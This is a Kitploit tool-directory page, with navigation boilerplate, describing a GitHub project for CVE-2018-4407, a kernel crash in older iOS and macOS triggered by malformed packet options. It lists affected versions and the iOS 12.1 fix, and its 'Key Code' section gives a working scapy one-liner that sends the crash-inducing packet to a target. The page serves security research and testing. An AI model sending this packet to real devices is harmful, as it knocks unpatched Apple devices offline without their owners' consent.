Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
check_icmp_dos-CVE-2018-4407- — CVE-2018-4407 概述與實現 | Kitploit
Tools/GitHubGitHub/s2339956/check_icmp_dos-cve-2018-4407-
Payload GenerationVulnerability AnalysisExploitationNetwork SecurityPenetration Testing
GitHubs2339956/check_icmp_dos-cve-2018-4407-

check_icmp_dos-CVE-2018-4407-

CVE-2018-4407 概述與實現

View Repository

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
117 years agoNot yet reviewed

Principle

The principle is to make other fields of the 'icmp' packet illegal. When the macOS or iPhone kernel parses it, it does not implement size checking, causing a crash.

Affected Devices

  1. Apple iOS 11 and earlier: all devices
  2. Apple macOS High Sierra (highest affected version 10.13.6): all devices
  3. Apple macOS Sierra (highest affected version 10.12.6): all devices
  4. Apple OS X El Capitan and earlier: all devices

Apple completely fixed this vulnerability in the 'iOS 12.1' update released on October 30.

Key Code

root@kitploit:~
pip install scapy
sudo scapy send(IP(dst="Target IP",options=[IPOption("A"*8)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)]))

Links

Chinese Explanation
English Explanation

Download Tool